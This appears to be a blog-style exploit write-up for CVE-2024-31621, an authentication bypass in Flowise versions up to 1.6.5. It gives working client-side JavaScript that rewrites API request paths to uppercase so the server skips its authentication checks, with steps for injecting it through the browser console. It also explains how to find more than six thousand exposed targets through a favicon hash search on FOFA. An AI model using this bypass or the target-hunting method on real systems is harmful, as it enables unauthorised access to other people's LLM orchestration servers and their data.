CVE-2024-31621
Flowise <= 1.6.5 authentication bypass
Flowise is an open source low-code tool for developers to build customized LLM orchestration flow & AI agents.
Basically server doesn't checks requests to the uppercase endpoint /API/V1.
We just have to replace all ajax requests endpoints to its uppercase version, and we'll do this client side.
here's the javascript code taken from my gist
var req = XMLHttpRequest.prototype.open;
XMLHttpRequest.prototype.open = function(method, url) {
arguments[1] = url.replace('/api/v1/','/API/V1/');
return req.apply(this, arguments);
};
To use this, navigate to a page that does not require authentication (ex: /tools),
then inject this code inside dev tools console.
Congratulations! This will last until you reload manually the page
[*] flowise_authbypass.png
Looking for vulnerable targets
Its favicon hash is -2051052918, knowing this we just have to search it on FOFA,
giving to us more than 6k results.
[*] fofa_results.png
By the way, most of these results are even without login bruh, this is because AI is a hot topic these last years,
so unexperienced people and companies will find a way to use an LLM for anything, inappropriate or not.